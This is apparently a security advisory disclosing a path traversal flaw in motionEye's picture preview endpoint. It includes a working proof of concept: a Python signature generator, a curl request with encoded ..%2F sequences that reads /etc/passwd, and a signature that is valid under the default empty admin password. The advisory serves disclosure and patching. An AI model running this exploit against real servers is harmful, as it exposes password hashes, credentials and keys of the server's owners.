GHSA-g9fx-5r4h-pcw3

### Summary

motionEye v0.43.1 (latest stable) is vulnerable to path traversal in the picture and movie API endpoints, like `/picture/{id}/preview/{filename}`. Neither the API handlers, nor the `mediafiles.py` functions like `get_media_preview()` check for `..` sequences in the filename parameter, except `get_media_content()` which does. This allows an authenticated user with normal (non-admin) privileges to read arbitrary files from the filesystem as the motionEye process user.

### Details

The `get_media_content()` function properly validates the path:

```python # mediafiles.py ~line 506 — SAFE def get_media_content(camera_config, path, media_type): target_dir = camera_config['target_dir'] full_path = os.path.join(target_dir, path)

if '..' in path: # <-- PATH TRAVERSAL CHECK PRESENT return None ... ```

But `get_media_preview()` does NOT:

```python # mediafiles.py ~line 910 — VULNERABLE def get_media_preview(camera_config, path, media_type, ...): target_dir = camera_config['target_dir'] full_path = os.path.join(target_dir, path) # <-- NO '..' CHECK ... ```

Similarly, `del_media_content()` at line ~865 is also missing the check. This is a classic inconsistent fix pattern.

The exploit requires `%2F`-encoded slashes (`..%2F..%2F`) which Tornado's URL router does NOT normalize — it passes the raw `../` through to `os.path.join()`.

### PoC

**Step 1:** Authenticate as any user (normal or admin).

**Step 2:** Compute the request signature. motionEye uses HMAC-style signatures for API authentication. The signature is `SHA1("GET:<path>?_username=<user>::<password>")`. With the default empty admin password:

```python #!/usr/bin/env python3 """Signature generator for motionEye path traversal PoC""" import hashlib, re, urllib.parse

_SIGNATURE_REGEX = re.compile(r'[^A-Za-z0-9/?_.=&{}\[\]\":, -]', re.DOTALL)

def compute_signature(method, path, key=''): parts = list(urllib.parse.urlsplit(path)) query = [q for q in urllib.parse.parse_qsl(parts[3], keep_blank_values=True) if q[0] != '_signature'] query.sort(key=lambda q: q[0]) query = [(n, urllib.parse.quote(v, safe="!'()*~")) for (n, v) in query] query = '&'.join([(q[0] + '=' + q[1]) for q in query]) parts[0] = parts[1] = '' parts[3] = query path = urllib.parse.urlunsplit(parts) path = _SIGNATURE_REGEX.sub('-', path) key = _SIGNATURE_REGEX.sub('-', key) return hashlib.sha1(('{}:{}:{}:{}'.format(method, path, '', key)).encode('utf-8')).hexdigest().lower()

path = '/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin' sig = compute_signature('GET', path) print(f'Signature: {sig}') print(f'curl --path-as-is -s "http://TARGET:8765/{path}&_signature={sig}"') ```

**Step 3:** Send the request using `curl --path-as-is` (the `--path-as-is` flag is **required** — without it, curl normalizes `..%2F` and collapses the traversal before sending):

```bash # With default empty admin password, the signature is static: curl --path-as-is -s "http://localhost:8766/picture/1/preview/..%2F..%2F..%2F..%2Fetc%2Fpasswd?_username=admin&_signature=8b387100a519c617bdd66fe629d14b05e09c6e0c" ```

**Step 4:** The server returns the contents of `/etc/passwd`.

**Verified output:**

<img width="1743" height="410" alt="etc_passwd" src="https://github.com/user-attachments/assets/30ec85f7-4fe7-4d3b-ae23-1d02c3ecad64" />

> **Note on the signature value:** The signature `8b387100a519c617bdd66fe629d14b05e09c6e0c` is valid for the default empty admin password. If the admin password has been changed, regenerate the signature using the Python script above with the correct password passed as the `key` parameter.

### Impact

An authenticated user (normal or admin) can read arbitrary files from the server, including:

- `/etc/passwd` — user enumeration - `/etc/motioneye/motion.conf` — admin password hash, surveillance password in plaintext - `/etc/shadow` — password hashes (if running as root, which is default in Docker) - SSH keys, environment variables, and other sensitive configuration files - Surveillance footage from other cameras